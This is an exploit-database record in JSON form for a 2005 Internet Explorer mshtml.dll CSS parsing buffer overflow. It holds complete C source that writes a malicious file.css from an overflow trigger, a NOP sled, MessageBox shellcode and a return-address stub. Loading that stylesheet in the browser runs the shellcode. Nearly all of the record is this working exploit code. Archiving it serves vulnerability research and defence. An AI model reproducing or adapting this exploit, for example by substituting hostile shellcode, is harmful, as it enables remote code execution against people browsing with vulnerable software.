Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-63033", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "MS Internet Explorer \"mshtml.dll\" CSS Parsing Buffer Overflow", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63033", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2014-07-01T00:00:00", "sourceData": "\n /* \r\nTaken from http://www.securiteam.com/exploits/5NP042KF5A.html \r\n\r\nThe exploit will create a .CSS file that should be included \r\nin an HTML file. When a user loads the HTML file, Internet \r\nExplorer will try to parse the CSS and will trigger the \r\nbuffer overflow. \r\n*/\r\n\r\n//Exploit Code:\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <tchar.h>\r\n\r\nchar bug[]=\r\n"\\x40\\x63\\x73\\x73\\x20\\x6D\\x6D\\x7B\\x49\\x7B\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3A\\x20\\x22\\x22\\x3B\\x2F"\r\n"\\x2A\\x22\\x20\\x22\\x2A\\x2F\\x7D\\x7D\\x40\\x6D\\x3B\\x40\\x65\\x6E\\x64\\x3B\\x20\\x2F\\x2A\\x22\\x7D\\x7D\\x20\\x20\\x20";\r\n\r\n//////////////////////////////////////////////////////\r\n/*\r\nshellcode :MessageBox (0,"hack ie6",0,MB_OK);\r\n-\r\nXOR EBX,EBX\r\nPUSH EBX ; 0\r\nPUSH EBX ; 0\r\nADD AL,0F\r\nPUSH EAX ; Msg " Hack ie6 "\r\nPUSH EBX ;0\r\nJMP 746D8E72 ;USER32.MessageBoxA\r\n*/\r\n\r\nchar shellcode[]= "\\x33\\xDB\\x53\\x53\\x04\\x0F\\x50\\x53\\xE9\\xCB\\x8D\\x6D\\x74"\r\n"\\x90\\x90\\x48\\x61\\x63\\x6B\\x20\\x69\\x65\\x36\\x20\\x63\\x73\\x73";\r\n\r\n\r\n////////////////////////////////////////////////////////\r\n// return address :: esp+1AC :: start shellcode\r\n//MOV EAX,ESP\r\n//ADD AX,1AC\r\n//CALL EAX\r\n\r\nchar ret[]= "\\x8B\\xC4\\x66\\x05\\xAC\\x01\\xFF\\xD0";\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\r\n char buf[8192];\r\n FILE *cssfile;\r\n int i;\r\n\r\n printf("\\n\\n Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit \\n");\r\n printf(" 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n");\r\n printf(" Coded by : Arabteam2000 \\n");\r\n printf(" Web: www.arabteam2000.com \\n");\r\n printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\\n");\r\n\r\n // NOP`s\r\n for(i=0;i<8192;i++)\r\n buf[i]=0x90;\r\n\r\n\r\n // bug\r\n memcpy((void*)&buf[0],\r\n (void*)&bug,48);\r\n\r\n // shellcode\r\n memcpy((void*)&buf[100],\r\n (void*)&shellcode,27);\r\n\r\n // ret address\r\n memcpy((void*)&buf[8182],\r\n (void*)&ret,8);\r\n\r\n\r\n cssfile=fopen("file.css","w+b");\r\n if(cssfile==NULL){\r\n printf("-Error: fopen \\n");\r\n return 1;\r\n }\r\n\r\n fwrite(buf,8192,1,cssfile);\r\n printf("-Created file: file.css\\n ..OK\\n\\n");\r\n\r\n fclose (cssfile);\r\n return 0;\r\n}\n\n// milw0rm.com [2005-03-09]\n\n ", "id": "SSV:63033", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:15:23", "reporter": "Root", "enchantments": {"score": {"value": 7.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 7.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645314319, "score": 1683883310, "epss": 1678848988}, "_internal": {"score_hash": "91fb7fe26d18ab381faf637e973ff65f"}}